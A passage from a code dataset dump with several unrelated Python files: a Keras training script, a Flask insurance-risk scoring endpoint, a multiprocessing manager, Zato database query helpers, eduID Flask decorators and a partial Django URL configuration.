activation='softmax'))\n\nprint(model.summary())\n\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n# try:\n# # model.load_weights('E:\\pythonwork\\data\\e06.h5')\n# api_file.loadMode(model,'E:\\pythonwork\\data\\e06.h5')\n# except:\nhistory = model.fit(x=train_image_hot, y=train_label_hot, validation_split=0.2, epochs=10, batch_size=300, verbose=2)\napi_image.showTrainHistory(history, 'acc', 'val_acc')\napi_image.showTrainHistory(history, 'loss', 'val_loss')\nscores = model.evaluate(test_image_hot, test_label_hot)\nprint('\\n', scores, '\\n')\n\nprediction = model.predict_classes(test_image_hot)\napi_image.showImageLabelPrediction(test_image, test_label, prediction, 0, 25)\napi_image.confusionMatrix(test_label, prediction)\n\napi_file.saveMode(model, 'E:\\pythonwork\\data\\e06.h5')\n# model.save_weights('E:\\pythonwork\\data\\e06.h5')\n","sub_path":"tensorflow/com/kailin/e06.py","file_name":"e06.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"130968287","text":"from flask import Flask, request, jsonify\r\nfrom flask_restful import Resource, Api\r\nfrom json import dumps\r\nimport datetime\r\n\r\nclass UserInsuranceOffers(Resource):\r\n def post(self):\r\n # define result structure with null values\r\n result = {\r\n 'auto': None,\r\n 'disability': None,\r\n 'home': None,\r\n 'life': None\r\n }\r\n\r\n # treating when receiving an empty body request\r\n if request.json != None:\r\n # get object user sent\r\n user = request.json\r\n # defining user`s base risk score\r\n base_score = 0\r\n for i in user['risk_questions']:\r\n base_score += i\r\n # set initial risk score for each user`s insurance line\r\n risk_score = {\r\n 'auto': base_score,\r\n 'disability': base_score,\r\n 'home': base_score,\r\n 'life': base_score\r\n } \r\n # get actual year for future comparison\r\n this_year = datetime.datetime.now().year\r\n\r\n if user['income'] == 0:\r\n result['disability'] = 'ineligible'\r\n if len(user['house']) == 0:\r\n result['home'] = 'ineligible' \r\n if len(user['vehicle']) == 0:\r\n result['auto'] = 'ineligible'\r\n\r\n if user['age'] > 60:\r\n result['disability'] = 'ineligible'\r\n result['life'] = 'ineligible'\r\n elif user['age'] < 30:\r\n risk_score['auto'] -= 2\r\n risk_score['disability'] -= 2\r\n risk_score['home'] -= 2\r\n risk_score['life'] -= 2\r\n elif user['age'] >= 30 and user['age'] <= 40:\r\n risk_score['auto'] -= 1\r\n risk_score['disability'] -= 1\r\n risk_score['home'] -= 1\r\n risk_score['life'] -= 1\r\n\r\n if user['income'] > 200000:\r\n risk_score['auto'] -= 1\r\n risk_score['disability'] -= 1\r\n risk_score['home'] -= 1\r\n risk_score['life'] -= 1\r\n\r\n if len(user['house']) > 0 and user['house']['ownership_status'] == 'mortgaged':\r\n risk_score['home'] += 1\r\n\r\n if user['dependents'] > 0:\r\n risk_score['disability'] += 1\r\n risk_score['life'] += 1\r\n\r\n if user['marital_status'] == 'married':\r\n risk_score['disability'] -= 1\r\n risk_score['life'] += 1\r\n\r\n if len(user['vehicle']) > 0 and this_year - user['vehicle']['year'] <= 5:\r\n risk_score['auto'] += 1\r\n\r\n # defining user`s final score\r\n for key in result:\r\n # only allow final score changing if insurance life wasn`t previously defined as ineligible for user\r\n if result[key] != 'ineligible':\r\n if risk_score[key] <= 0:\r\n result[key] = 'economic'\r\n elif risk_score[key] > 0 and risk_score[key] < 3:\r\n result[key] = 'regular'\r\n elif risk_score[key] >= 3:\r\n result[key] = 'responsible' \r\n \r\n return jsonify(result)\r\n","sub_path":"app/main/classes/user_insurance_offers.py","file_name":"user_insurance_offers.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"93021957","text":"# -*- coding: utf-8 -*-\n\"\"\"\nWritten by Daniel M. Aukes and CONTRIBUTORS\nEmail: danaukesseas.harvard.edu.\nPlease see LICENSE for full license.\n\"\"\"\n\nfrom multiprocessing import Process\nfrom multiprocessing import Queue\nimport time\nimport random\nimport yaml\nimport os\n \n#def run_wrapper(a,b):\n# def wrap1(f):\n# print(a,b)\n# def wrapped_func(*args,**kwargs):\n# d = f(*args,**kwargs)\n# return d\n# return wrapped_func\n# return wrap1\n#\n#@run_wrapper('hey','babe')\n#def e(a,b,c):\n# print('inner',a,b,c)\n# return c\n \nclass DummyClass(object):\n def run(self): \n time.sleep(random.gauss(3,1))\n self.dummy = 'asdfsadfafds'\n\nclass ProcessDataWrapper(object):\n ii = 0\n def __init__(self,inner_process):\n self.index = ProcessDataWrapper.ii\n self.inner_process = inner_process\n ProcessDataWrapper.ii+=1\n def run_outer(self):\n self.time_started = time.time()\n self.inner_process.run()\n self.time_finished = time.time()\n self.time_elapsed = self.time_finished - self.time_started\n def save(self,folder):\n if not os.path.exists(folder):\n os.mkdir(folder)\n with open(os.path.normpath(os.path.join(folder,str(self.index)+'.dat')),'w') as f:\n yaml.dump(self,f)\n \nclass ProcessData(object):\n ii = 0\n def __init__(self):\n self.index = ProcessData.ii\n ProcessData.ii+=1\n def run_outer(self):\n self.time_started = time.time()\n self.run()\n self.time_finished = time.time()\n self.time_elapsed = self.time_finished - self.time_started\n def save(self,folder):\n with open(os.path.normpath(os.path.join(folder,str(self.index)+'.dat')),'w') as f:\n yaml.dump(self,f)\n \nclass DummyClass2(ProcessData):\n def run(self): \n time.sleep(random.gauss(3,1))\n self.dummy = 'asdfsadfafds'\n \nclass ProcessContainer(Process):\n def __init__(self,inner_process):\n Process.__init__(self)\n# self.process_data = ProcessDataWrapper(inner_process)\n self.process_data = inner_process\n def run(self):\n self.process_data.run_outer()\n self.queue.put(self.process_data)\n def set_queue(self,queue):\n self.queue = queue\n \nclass ProcessManager(object):\n sleep_time = .5\n def __init__(self,processes,max_processes=4,debug=True,block_till_finished = True,collect_all_data = True,save_data = False,save_dest = '.',refresh_display = None):\n self.all_processes = [ProcessContainer(p) for p in processes]\n self.processes = self.all_processes.copy()\n self.max_processes = max_processes\n self.debug = debug\n self.collect_all_data = collect_all_data\n if self.collect_all_data:\n self.data= []\n self.save_data = save_data\n self.save_dest = save_dest\n self.block_till_finished = block_till_finished\n self.running = []\n self.done = []\n self.num_processes = len(self.processes)\n self.queue=Queue()\n self.checkalivedead()\n if refresh_display!=None:\n self.refresh_display = refresh_display\n \n def run(self):\n self.time_launched = time.time()\n self.print_debug('launching processes') \n while not not self.processes:\n if self.num_running < self.max_processes:\n num_can_start = self.max_processes - self.num_running \n num_remaining = len(self.processes)\n num_to_start = min(num_can_start,num_remaining)\n new_processes = []\n for ii in range(num_to_start):\n p = self.processes.pop(0)\n new_processes.append(p)\n p.set_queue(self.queue)\n p.start()\n self.running.append(p)\n# for p in new_processes:\n# p.join()\n string = '{0:0.0f} slots, {1:0.0f} remaining, {2:0.0f} started'.format(num_can_start,num_remaining,num_to_start)\n self.print_debug(string)\n self.checkalivedead()\n self.pull_queue()\n time.sleep(self.sleep_time)\n# for processss in self.all_processes:\n# proce.join()\n\n if self.block_till_finished:\n self.print_debug('waiting to clear')\n while not not self.running:\n self.checkalivedead()\n self.pull_queue()\n time.sleep(self.sleep_time)\n\n def checkalivedead(self):\n running = []\n new_done = False\n for process in self.running:\n if process.is_alive():\n running.append(process)\n else:\n self.done.append(process)\n new_done = True\n \n self.running = running\n self.num_running = len(self.running)\n self.num_done= len(self.done)\n if self.debug:\n if new_done:\n time_current = time.time()\n time_elapsed = time_current - self.time_launched\n time_remaining = (time_current-self.time_launched)/self.num_done*self.num_processes\n self.print_debug('{0:.2f} minutes elapsed/{1:.2f} minutes total, {2:d}/{3} finished'.format(time_elapsed/60,time_remaining/60,self.num_done,self.num_processes))\n\n def pull_queue(self):\n newitems = []\n while not self.queue.empty():\n item = self.queue.get()\n if self.collect_all_data:\n self.data.append(item)\n if self.save_data:\n item.save(self.save_dest)\n newitems.append(item)\n try:\n self.refresh_display(newitems)\n except AttributeError:\n pass\n \n def print_debug(self,*args,**kwargs):\n if self.debug:\n print(args,kwargs)\n\n\nif __name__ == '__main__':\n t0 = time.time()\n processes = [DummyClass2() for index in range(20)]\n pm = ProcessManager(processes,max_processes=10,debug=True,block_till_finished = True,collect_all_data = False,save_data = True,save_dest = './data')\n pm.run()\n \n t1 = time.time()\n print('elapsed time: ',t1-t0)\n","sub_path":"dev_tools/process_manager.py","file_name":"process_manager.py","file_ext":"py","file_size_in_byte":6271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"44208307","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nCopyright (C) 2011 Dariusz Suchojad \n\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program. If not, see .\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\n# SQLAlchemy\nfrom sqlalchemy.sql.expression import case, literal_column\n\n# Zato\nfrom zato.common.odb.model import(ChannelAMQP, ChannelWMQ, ChannelZMQ, Cluster, \n ConnDefAMQP, ConnDefWMQ, CronStyleJob, HTTPBasicAuth, HTTPSOAP, IntervalBasedJob, \n Job, OutgoingAMQP, OutgoingFTP, OutgoingS3, OutgoingWMQ, OutgoingZMQ, \n Service, TechnicalAccount, WSSDefinition)\n\n# ##############################################################################\n\ndef internal_channel_list(session, cluster_id):\n \"\"\" All the HTTP/SOAP channels that point to internal services.\n \"\"\"\n return session.query(HTTPSOAP.soap_action, Service.name).\\\n filter(HTTPSOAP.cluster_id==Cluster.id).\\\n filter(HTTPSOAP.service_id==Service.id).\\\n filter(Service.is_internal==True).\\\n filter(Cluster.id==cluster_id)\n\n# ##############################################################################\n\ndef job_list(session, cluster_id):\n \"\"\" All the scheduler's jobs defined in the ODB.\n \"\"\"\n return session.query(Job.id, Job.name, Job.is_active,\n Job.job_type, Job.start_date, Job.extra,\n Service.name.label('service_name'), Service.id.label('service_id'),\n IntervalBasedJob.weeks, IntervalBasedJob.days,\n IntervalBasedJob.hours, IntervalBasedJob.minutes,\n IntervalBasedJob.seconds, IntervalBasedJob.repeats,\n CronStyleJob.cron_definition).\\\n outerjoin(IntervalBasedJob, Job.id==IntervalBasedJob.job_id).\\\n outerjoin(CronStyleJob, Job.id==CronStyleJob.job_id).\\\n filter(Cluster.id==cluster_id).\\\n filter(Job.service_id==Service.id).\\\n order_by('job.name').\\\n all()\n\n# ##############################################################################\n\ndef basic_auth_list(session, cluster_id):\n \"\"\" All the HTTP Basic Auth definitions.\n \"\"\"\n return session.query(HTTPBasicAuth).\\\n filter(Cluster.id==cluster_id).\\\n order_by('http_basic_auth_def.name').\\\n all()\n\ndef tech_acc_list(session, cluster_id):\n \"\"\" All the technical accounts.\n \"\"\"\n return session.query(TechnicalAccount).\\\n order_by(TechnicalAccount.name).\\\n filter(Cluster.id==cluster_id).\\\n all()\n\ndef wss_list(session, cluster_id):\n \"\"\" All the WS-Security definitions.\n \"\"\"\n return session.query(WSSDefinition).\\\n filter(Cluster.id==cluster_id).\\\n order_by('wss_def.name').\\\n all()\n\n# ##############################################################################\n\ndef _def_amqp(session, cluster_id):\n return session.query(ConnDefAMQP.name, ConnDefAMQP.id, ConnDefAMQP.host,\n ConnDefAMQP.port, ConnDefAMQP.vhost, ConnDefAMQP.username,\n ConnDefAMQP.frame_max, ConnDefAMQP.heartbeat, ConnDefAMQP.password).\\\n filter(Cluster.id==ConnDefAMQP.cluster_id).\\\n filter(ConnDefAMQP.def_type=='amqp').\\\n filter(Cluster.id==cluster_id).\\\n order_by(ConnDefAMQP.name)\n\ndef def_amqp(session, cluster_id, id):\n \"\"\" A particular AMQP definition\n \"\"\"\n return _def_amqp(session, cluster_id).\\\n filter(ConnDefAMQP.id==id).\\\n one()\n\ndef def_amqp_list(session, cluster_id):\n \"\"\" AMQP connection definitions.\n \"\"\"\n return _def_amqp(session, cluster_id).all()\n\n# ##############################################################################\n\ndef _def_jms_wmq(session, cluster_id):\n return session.query(ConnDefWMQ.id, ConnDefWMQ.name, ConnDefWMQ.host,\n ConnDefWMQ.port, ConnDefWMQ.queue_manager, ConnDefWMQ.channel,\n ConnDefWMQ.cache_open_send_queues, ConnDefWMQ.cache_open_receive_queues,\n ConnDefWMQ.use_shared_connections, ConnDefWMQ.ssl, ConnDefWMQ.ssl_cipher_spec,\n ConnDefWMQ.ssl_key_repository, ConnDefWMQ.needs_mcd, ConnDefWMQ.max_chars_printed).\\\n filter(Cluster.id==ConnDefWMQ.cluster_id).\\\n filter(Cluster.id==cluster_id).\\\n order_by(ConnDefWMQ.name)\n\ndef def_jms_wmq(session, cluster_id, id):\n \"\"\" A particular JMS WebSphere MQ definition\n \"\"\"\n return _def_jms_wmq(session, cluster_id).\\\n filter(ConnDefWMQ.id==id).\\\n one()\n\ndef def_jms_wmq_list(session, cluster_id):\n \"\"\" JMS WebSphere MQ connection definitions.\n \"\"\"\n return _def_jms_wmq(session, cluster_id).all()\n\n# ##############################################################################\n\ndef _out_amqp(session, cluster_id):\n return session.query(OutgoingAMQP.id, OutgoingAMQP.name, OutgoingAMQP.is_active,\n OutgoingAMQP.delivery_mode, OutgoingAMQP.priority, OutgoingAMQP.content_type,\n OutgoingAMQP.content_encoding, OutgoingAMQP.expiration, OutgoingAMQP.user_id,\n OutgoingAMQP.app_id, ConnDefAMQP.name.label('def_name'), OutgoingAMQP.def_id).\\\n filter(OutgoingAMQP.def_id==ConnDefAMQP.id).\\\n filter(ConnDefAMQP.id==OutgoingAMQP.def_id).\\\n filter(Cluster.id==ConnDefAMQP.cluster_id).\\\n filter(Cluster.id==cluster_id).\\\n order_by(OutgoingAMQP.name)\n\ndef out_amqp(session, cluster_id, id):\n \"\"\" An outgoing AMQP connection.\n \"\"\"\n return _out_amqp(session, cluster_id).\\\n filter(OutgoingAMQP.id==id).\\\n one()\n\ndef out_amqp_list(session, cluster_id):\n \"\"\" Outgoing AMQP connections.\n \"\"\"\n return _out_amqp(session, cluster_id).all()\n\n# ##############################################################################\n\ndef _out_jms_wmq(session, cluster_id):\n return session.query(OutgoingWMQ.id, OutgoingWMQ.name, OutgoingWMQ.is_active,\n OutgoingWMQ.delivery_mode, OutgoingWMQ.priority, OutgoingWMQ.expiration,\n ConnDefWMQ.name.label('def_name'), OutgoingWMQ.def_id).\\\n filter(OutgoingWMQ.def_id==ConnDefWMQ.id).\\\n filter(ConnDefWMQ.id==OutgoingWMQ.def_id).\\\n filter(Cluster.id==ConnDefWMQ.cluster_id).\\\n filter(Cluster.id==cluster_id).\\\n order_by(OutgoingWMQ.name)\n\ndef out_jms_wmq(session, cluster_id, id):\n \"\"\" An outgoing JMS WebSphere MQ connection.\n \"\"\"\n return _out_jms_wmq(session, cluster_id).\\\n filter(OutgoingWMQ.id==id).\\\n one()\n\ndef out_jms_wmq_list(session, cluster_id):\n \"\"\" Outgoing JMS WebSphere MQ connections.\n \"\"\"\n return _out_jms_wmq(session, cluster_id).all()\n\n# ##############################################################################\n\ndef _channel_amqp(session, cluster_id):\n return session.query(ChannelAMQP.id, ChannelAMQP.name, ChannelAMQP.is_active,\n ChannelAMQP.queue, ChannelAMQP.consumer_tag_prefix,\n ConnDefAMQP.name.label('def_name'), ChannelAMQP.def_id,\n Service.name.label('service_name')).\\\n filter(ChannelAMQP.def_id==ConnDefAMQP.id).\\\n filter(ChannelAMQP.service_id==Service.id).\\\n filter(Cluster.id==ConnDefAMQP.cluster_id).\\\n filter(Cluster.id==cluster_id).\\\n order_by(ChannelAMQP.name)\n\ndef channel_amqp(session, cluster_id, id):\n \"\"\" A particular AMQP channel.\n \"\"\"\n return _channel_amqp(session, cluster_id).\\\n filter(ChannelAMQP.id==id).\\\n one()\n\ndef channel_amqp_list(session, cluster_id):\n \"\"\" AMQP channels.\n \"\"\"\n return _channel_amqp(session, cluster_id).all()\n\n# ##############################################################################\n\ndef _channel_jms_wmq(session, cluster_id):\n return session.query(ChannelWMQ.id, ChannelWMQ.name, ChannelWMQ.is_active,\n ChannelWMQ.queue, ConnDefWMQ.name.label('def_name'), ChannelWMQ.def_id,\n Service.name.label('service_name')).\\\n filter(ChannelWMQ.def_id==ConnDefWMQ.id).\\\n filter(ChannelWMQ.service_id==Service.id).\\\n filter(Cluster.id==ConnDefWMQ.cluster_id).\\\n filter(Cluster.id==cluster_id).\\\n order_by(ChannelWMQ.name)\n\ndef channel_jms_wmq(session, cluster_id, id):\n \"\"\" A particular JMS WebSphere MQ channel.\n \"\"\"\n return _channel_jms_wmq(session, cluster_id).\\\n filter(ChannelWMQ.id==id).\\\n one()\n\ndef channel_jms_wmq_list(session, cluster_id):\n \"\"\" JMS WebSphere MQ channels.\n \"\"\"\n return _channel_jms_wmq(session, cluster_id).all()\n\n# ##############################################################################\n\ndef _out_zmq(session, cluster_id):\n return session.query(OutgoingZMQ.id, OutgoingZMQ.name, OutgoingZMQ.is_active,\n OutgoingZMQ.address, OutgoingZMQ.socket_type).\\\n filter(Cluster.id==OutgoingZMQ.cluster_id).\\\n filter(Cluster.id==cluster_id).\\\n order_by(OutgoingZMQ.name)\n\ndef out_zmq(session, cluster_id, id):\n \"\"\" An outgoing ZeroMQ connection.\n \"\"\"\n return _out_zmq(session, cluster_id).\\\n filter(OutgoingZMQ.id==id).\\\n one()\n\ndef out_zmq_list(session, cluster_id):\n \"\"\" Outgoing ZeroMQ connections.\n \"\"\"\n return _out_zmq(session, cluster_id).all()\n\n# ##############################################################################\n\ndef _channel_zmq(session, cluster_id):\n return session.query(ChannelZMQ.id, ChannelZMQ.name, ChannelZMQ.is_active,\n ChannelZMQ.address, ChannelZMQ.socket_type, ChannelZMQ.sub_key, \n Service.name.label('service_name')).\\\n filter(Cluster.id==ChannelZMQ.cluster_id).\\\n filter(Service.id==ChannelZMQ.service_id).\\\n filter(Cluster.id==cluster_id).\\\n order_by(ChannelZMQ.name)\n\ndef channel_zmq(session, cluster_id, id):\n \"\"\" An incoming ZeroMQ connection.\n \"\"\"\n return _channel_zmq(session, cluster_id).\\\n filter(ChannelZMQ.id==id).\\\n one()\n\ndef channel_zmq_list(session, cluster_id):\n \"\"\" Incoming ZeroMQ connections.\n \"\"\"\n return _channel_zmq(session, cluster_id).all()\n\n# ##############################################################################\n\ndef _http_soap(session, cluster_id):\n\n tech_acc_case_id = (SecurityDefinition.security_def_type=='tech_acc', \n literal_column('(select tech_account.id from tech_account where tech_account.security_def_id = security_def.id)'))\n tech_acc_case_name = (SecurityDefinition.security_def_type=='tech_acc', \n literal_column('(select tech_account.name from tech_account where tech_account.security_def_id = security_def.id)'))\n \n wss_case_id = (SecurityDefinition.security_def_type=='wss_username_password', \n literal_column('(select wss_def.id from wss_def where wss_def.security_def_id = security_def.id)'))\n wss_case_name = (SecurityDefinition.security_def_type=='wss_username_password', \n literal_column('(select wss_def.name from wss_def where wss_def.security_def_id = security_def.id)'))\n \n basic_auth_case_id = (SecurityDefinition.security_def_type=='basic_auth', \n literal_column('(select http_basic_auth_def.id from http_basic_auth_def where http_basic_auth_def.security_def_id = security_def.id)'))\n basic_auth_case_name = (SecurityDefinition.security_def_type=='basic_auth', \n literal_column('(select http_basic_auth_def.name from http_basic_auth_def where http_basic_auth_def.security_def_id = security_def.id)'))\n \n return session.query(HTTPSOAP.id, HTTPSOAP.name, HTTPSOAP.is_active, \n HTTPSOAP.is_internal, HTTPSOAP.transport, HTTPSOAP.url_path, \n HTTPSOAP.method, HTTPSOAP.soap_action, HTTPSOAP.soap_version, \n Service.id.label('service_id'),\n Service.name.label('service_name'),\n Service.impl_name,\n SecurityDefinition.id.label('security_def_id'),\n SecurityDefinition.security_def_type,\n case([tech_acc_case_id, wss_case_id, basic_auth_case_id]).label('security_id'),\n case([tech_acc_case_name, wss_case_name, basic_auth_case_name]).label('security_name'),\n ).\\\n outerjoin(HTTPSOAPSecurity, HTTPSOAPSecurity.http_soap_id==HTTPSOAP.id).\\\n outerjoin(SecurityDefinition, HTTPSOAPSecurity.security_def_id==SecurityDefinition.id).\\\n filter(Cluster.id==HTTPSOAP.cluster_id).\\\n filter(Service.id==HTTPSOAP.service_id).\\\n filter(Cluster.id==cluster_id).\\\n order_by(HTTPSOAP.name)\n\n# No point in creating a new function if we can aliast an already existing one.\nhttp_soap_security_list = _http_soap\n\ndef http_soap(session, cluster_id, id):\n \"\"\" An HTTP/SOAP connection.\n \"\"\"\n return _http_soap(session, cluster_id).\\\n filter(HTTPSOAP.id==id).\\\n one()\n\ndef http_soap_list(session, cluster_id, connection=None, transport=None):\n \"\"\" HTTP/SOAP connections.\n \"\"\"\n q = _http_soap(session, cluster_id)\n \n if connection:\n q = q.filter(HTTPSOAP.connection==connection)\n \n if transport:\n q = q.filter(HTTPSOAP.transport==transport)\n \n return q.all()\n\n# ##############################################################################\n\ndef _out_s3(session, cluster_id):\n return session.query(OutgoingS3.id, OutgoingS3.name, OutgoingS3.is_active,\n OutgoingS3.prefix, OutgoingS3.separator,\n OutgoingS3.key_sync_timeout).\\\n filter(Cluster.id==OutgoingS3.cluster_id).\\\n filter(Cluster.id==cluster_id).\\\n order_by(OutgoingS3.name)\n\ndef out_s3(session, cluster_id, id):\n \"\"\" An outgoing S3 connection.\n \"\"\"\n return _out_s3(session, cluster_id).\\\n filter(OutgoingS3.id==id).\\\n one()\n\ndef out_s3_list(session, cluster_id):\n \"\"\" Outgoing S3 connections.\n \"\"\"\n return _out_s3(session, cluster_id).all()\n\n# ##############################################################################\n\ndef _out_ftp(session, cluster_id):\n return session.query(OutgoingFTP.id, OutgoingFTP.name, OutgoingFTP.is_active,\n OutgoingFTP.host, OutgoingFTP.port, OutgoingFTP.user, OutgoingFTP.password, \n OutgoingFTP.acct, OutgoingFTP.timeout, OutgoingFTP.dircache).\\\n filter(Cluster.id==OutgoingFTP.cluster_id).\\\n filter(Cluster.id==cluster_id).\\\n order_by(OutgoingFTP.name)\n\ndef out_ftp(session, cluster_id, id):\n \"\"\" An outgoing FTP connection.\n \"\"\"\n return _out_ftp(session, cluster_id).\\\n filter(OutgoingFTP.id==id).\\\n one()\n\ndef out_ftp_list(session, cluster_id):\n \"\"\" Outgoing FTP connections.\n \"\"\"\n return _out_ftp(session, cluster_id).all()\n\n# ##############################################################################\n\ndef _service(session, cluster_id):\n return session.query(Service.id, Service.name, Service.is_active,\n Service.impl_name, Service.is_internal).\\\n filter(Cluster.id==Service.cluster_id).\\\n filter(Cluster.id==cluster_id).\\\n order_by(Service.name)\n\ndef service(session, cluster_id, id):\n \"\"\" A service.\n \"\"\"\n return _service(session, cluster_id).\\\n filter(Service.id==id).\\\n one()\n\ndef service_list(session, cluster_id):\n \"\"\" All services.\n \"\"\"\n return _service(session, cluster_id).all()\n\n# ##############################################################################\n","sub_path":"code/zato-common/src/zato/common/odb/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":15841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"241840598","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\n\nimport inspect\nimport warnings\nfrom functools import wraps\n\nfrom flask import abort, jsonify, request\nfrom marshmallow.exceptions import ValidationError\nfrom six import string_types\nfrom werkzeug.wrappers import Response as WerkzeugResponse\n\nfrom eduid_common.api.messages import FluxData, error_response\nfrom eduid_common.api.schemas.models import FluxFailResponse, FluxResponseStatus, FluxSuccessResponse\nfrom eduid_common.api.utils import get_user\nfrom eduid_common.session import session\n\n__author__ = 'lundberg'\n\n\ndef require_eppn(f):\n @wraps(f)\n def require_eppn_decorator(*args, **kwargs):\n eppn = session.get('user_eppn', None)\n # If the user is logged in and has a session\n # pass on the request to the decorated view\n # together with the eppn of the logged in user.\n if eppn:\n kwargs['eppn'] = eppn\n return f(*args, **kwargs)\n abort(401)\n\n return require_eppn_decorator\n\n\ndef require_user(f):\n @wraps(f)\n def require_user_decorator(*args, **kwargs):\n user = get_user()\n kwargs['user'] = user\n return f(*args, **kwargs)\n\n return require_user_decorator\n\n\ndef can_verify_identity(f):\n @wraps(f)\n def verify_identity_decorator(*args, **kwargs):\n user = get_user()\n # For now a user can just have one verified NIN\n if user.nins.primary is not None:\n # TODO: Make this a CommonMsg I guess\n return error_response(message='User is already verified')\n # A user can not verify a nin if another previously was verified\n locked_nin = user.locked_identity.find('nin')\n if locked_nin and locked_nin.number != kwargs['nin']:\n # TODO: Make this a CommonMsg I guess\n return error_response(message='Another nin is already registered for this user')\n\n return f(*args, **kwargs)\n\n return verify_identity_decorator\n\n\nclass MarshalWith(object):\n \"\"\"\n Decorator to format the data returned from a Flask view and ensure it conforms to a marshmallow schema.\n\n A common usage is to use this to format the response as a Flux Standard Action\n (https://github.com/redux-utilities/flux-standard-action) by using a schema that has FluxStandardAction\n as superclass, or as a mixin.\n\n See the documentation of the FluxResponse class, or the link above, for more information about the\n on-the-wire format of these Flux Standard Actions.\n \"\"\"\n\n def __init__(self, schema):\n self.schema = schema\n\n def __call__(self, f):\n @wraps(f)\n def marshal_decorator(*args, **kwargs):\n # Call the Flask view, which is expected to return a FluxData instance,\n # or in special cases an WerkzeugResponse (e.g. when a redirect is performed).\n ret = f(*args, **kwargs)\n\n if isinstance(ret, WerkzeugResponse):\n # No need to Marshal again, someone else already did that\n return ret\n\n if isinstance(ret, dict):\n # TODO: Backwards compatibility mode - work on removing the need for this\n ret = FluxData(FluxResponseStatus.OK, payload=ret)\n\n if not isinstance(ret, FluxData):\n raise TypeError('Data returned from Flask view was not a FluxData (or WerkzeugResponse) instance')\n\n if ret.status != FluxResponseStatus.OK:\n _flux_response = FluxFailResponse(request, payload=ret.payload)\n else:\n _flux_response = FluxSuccessResponse(request, payload=ret.payload)\n return jsonify(self.schema().dump(_flux_response.to_dict()))\n\n return marshal_decorator\n\n\nclass UnmarshalWith(object):\n def __init__(self, schema):\n self.schema = schema\n\n def __call__(self, f):\n @wraps(f)\n def unmarshal_decorator(*args, **kwargs):\n try:\n json_data = request.get_json()\n if json_data is None:\n json_data = {}\n unmarshal_result = self.schema().load(json_data)\n kwargs.update(unmarshal_result)\n return f(*args, **kwargs)\n except ValidationError as e:\n response_data = FluxFailResponse(\n request, payload={'error': e.normalized_messages(), 'csrf_token': session.get_csrf_token()}\n )\n return jsonify(response_data.to_dict())\n\n return unmarshal_decorator\n\n\n# https://stackoverflow.com/questions/2536307/how-do-i-deprecate-python-functions/40301488#40301488\ndef deprecated(reason):\n \"\"\"\n This is a decorator which can be used to mark functions\n as deprecated. It will result in a warning being emitted\n when the function is used.\n \"\"\"\n\n if isinstance(reason, string_types):\n\n # The @deprecated is used with a 'reason'.\n #\n # .. code-block:: python\n #\n # @deprecated(\"please, use another function\")\n # def old_function(x, y):\n # pass\n\n def decorator(func1):\n\n if inspect.isclass(func1):\n fmt1 = \"Call to deprecated class {name} ({reason}).\"\n else:\n fmt1 = \"Call to deprecated function {name} ({reason}).\"\n\n @wraps(func1)\n def new_func1(*args, **kwargs):\n warnings.simplefilter('always', DeprecationWarning)\n warnings.warn(\n fmt1.format(name=func1.__name__, reason=reason), category=DeprecationWarning, stacklevel=2\n )\n warnings.simplefilter('default', DeprecationWarning)\n return func1(*args, **kwargs)\n\n return new_func1\n\n return decorator\n\n elif inspect.isclass(reason) or inspect.isfunction(reason):\n\n # The @deprecated is used without any 'reason'.\n #\n # .. code-block:: python\n #\n # @deprecated\n # def old_function(x, y):\n # pass\n\n func2 = reason\n\n if inspect.isclass(func2):\n fmt2 = \"Call to deprecated class {name}.\"\n else:\n fmt2 = \"Call to deprecated function {name}.\"\n\n @wraps(func2)\n def new_func2(*args, **kwargs):\n warnings.simplefilter('always', DeprecationWarning)\n warnings.warn(fmt2.format(name=func2.__name__), category=DeprecationWarning, stacklevel=2)\n warnings.simplefilter('default', DeprecationWarning)\n return func2(*args, **kwargs)\n\n return new_func2\n\n else:\n raise TypeError(repr(type(reason)))\n\n\n@deprecated('Use eduid_common.api.decorators.deprecated instead')\nclass Deprecated(object):\n \"\"\"\n Mark deprecated functions with this decorator.\n\n Attention! Use it as the closest one to the function you decorate.\n\n :param message: The deprecation message\n :type message: str | unicode\n \"\"\"\n\n def __init__(self, message=None):\n self.message = message\n\n def __call__(self, func):\n if self.message is None:\n self.message = 'Deprecated function {!r} called'.format(func.__name__)\n\n @wraps(func)\n def new_func(*args, **kwargs):\n warnings.warn(self.message, category=DeprecationWarning, stacklevel=2)\n return func(*args, **kwargs)\n\n # work around a bug in functools.wraps thats fixed in python 3.2\n if getattr(new_func, '__wrapped__', None) is None:\n new_func.__wrapped__ = func\n return new_func\n","sub_path":"src/eduid_common/api/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":7549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"304752754","text":"from django.urls import include, path\nfrom rest_framework.routers import DefaultRouter\n\nfrom .views import (CategoryViewSet, CommentViewSet, GenreViewSet,\n ReviewViewSet, TitleViewSet)\n\nrouter = DefaultRouter()\nrouter.register(r'genres', GenreViewSet, 'Genre')\nrouter.register(r'categories', CategoryViewSet, 'Category')\nrouter.register(r'titles', TitleViewSet, 'Title')\nrouter.register(r'titles/(?P[0-9]+)/reviews', ReviewViewSet)\nrouter.register(\n r'titles/(?P[0-9]+)/reviews/(?P[0-9]+)/comments',\n CommentViewSet)\n\nurlpatterns = [\n path('v1/', include('users.urls')),\n path('v1/', 